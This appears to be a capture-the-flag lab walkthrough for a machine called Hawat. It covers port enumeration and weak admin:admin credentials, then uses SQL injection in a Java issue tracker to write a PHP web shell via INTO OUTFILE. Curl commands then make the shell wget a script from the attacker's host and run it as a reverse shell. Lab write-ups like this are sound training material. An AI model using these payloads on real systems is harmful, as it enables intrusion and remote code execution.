Hawat
Enumeration
17445/tcp open unknown
...
30455/tcp open http nginx 1.18.0
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-server-header: nginx/1.18.0
|_http-title: W3.CSS
50080/tcp open http Apache httpd 2.4.46 ((Unix) PHP/7.4.15)
| http-methods:
| Supported Methods: HEAD GET POST OPTIONS TRACE
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.46 (Unix) PHP/7.4.15
|_http-title: W3.CSS TemplateWeak credentials on 17445 and 50080 web services.
admin:admin
- Nikto v2.1.6/2.1.5
+ Target Host: 192.168.145.147
+ Target Port: 30455
...
+ GET /phpinfo.php: Output from the phpinfo() function was found.
Key point:
$_SERVER['DOCUMENT_ROOT'] = /srv/httpThere is a file at 50080: issuetracker.zip
issuetracker.zip ---
@GetMapping("/issue/checkByPriority")
...
conn = DriverManager.getConnection("jdbc:mysql://localhost:3306/issue_tracker",connectionProps);
String query = "SELECT message FROM issue WHERE priority='"+priority+"'";
System.out.println(query);
Statement stmt = conn.createStatement();
stmt.executeQuery(query);
...SQL Injection -> priority parameter
Access
Key payload:
"<?php system($_GET['cmd']);?>"
Main payload:
' UNION SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE '/srv/http/cmd.php'; --
The SQL Query:
"SELECT message FROM issue WHERE priority='Normal' UNION SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE '/srv/http/cmd.php'; --
Request:
POST /issue/checkByPriority?priority=Normal' UNION SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE '/srv/http/cmd.php'; --
URL Encoded:
POST /issue/checkByPriority?priority=Normal'%20UNION%20SELECT%20%22%3c%3fphp%20system(%24_GET%5b'cmd'%5d)%3b%20%3f%3e%22%20INTO%20OUTFILE%20%22%2fsrv%2fhttp%2fcmd.php%22%3b%20--%20 HTTP/1.1https://www.revshells.com/ - Bash 196 - 443 port - Reverse Shell
$ curl 'http://192.168.145.147:30455/cmd.php?cmd=wget http://192.168.49.145:443/shell.sh'
$ curl 'http://192.168.145.147:30455/cmd.php?cmd=bash -p shell.sh'Last updated